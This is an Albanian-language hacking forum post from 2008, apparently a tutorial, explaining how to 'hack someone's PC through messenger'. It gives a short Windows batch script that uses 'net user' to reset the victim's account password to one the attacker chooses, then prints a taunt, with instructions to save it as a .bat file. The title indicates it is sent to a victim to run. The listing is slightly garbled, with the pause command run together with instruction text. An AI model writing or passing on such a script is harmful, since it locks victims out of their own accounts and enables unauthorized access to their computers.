Valonq & CracKer-Y
 
ForumEarn moneyRegjistrohuidentifikimi

Share | 
 

 Hacko pc e dikujna permes messengerit

Shko poshtë 
AutoriMesazh
Valonq
Admin


Numri i postimeve : 152
Age : 31
Registration date : 14/10/2008

MesazhTitulli: Hacko pc e dikujna permes messengerit   Wed Dec 17, 2008 2:03 pm

kjo osht ajo qe duhet te beni::
krijoni nje text document te ri dhe ne te shkruani

Kodi:

1:@echo off
2:net user "psh emri i viktimes" dhe passin e ri qe doni ju *123456*
3:echo "Say Good Bay To The Bad Gay "
4:Pausemos harroni te futni passin e ri ne ato yjet ( shift 8 )
ruajeni si diqka qe ju doni por me pikë bat( .bat ) psh.. Say Good Bay To The Bad Gay.bat
ruajeni tek ALL FILES sepse ndryshe nuk funksionon

Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit http://black.bigforumpro.com
 
Hacko pc e dikujna permes messengerit
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
 :: Tutoriale-
Kërce tek: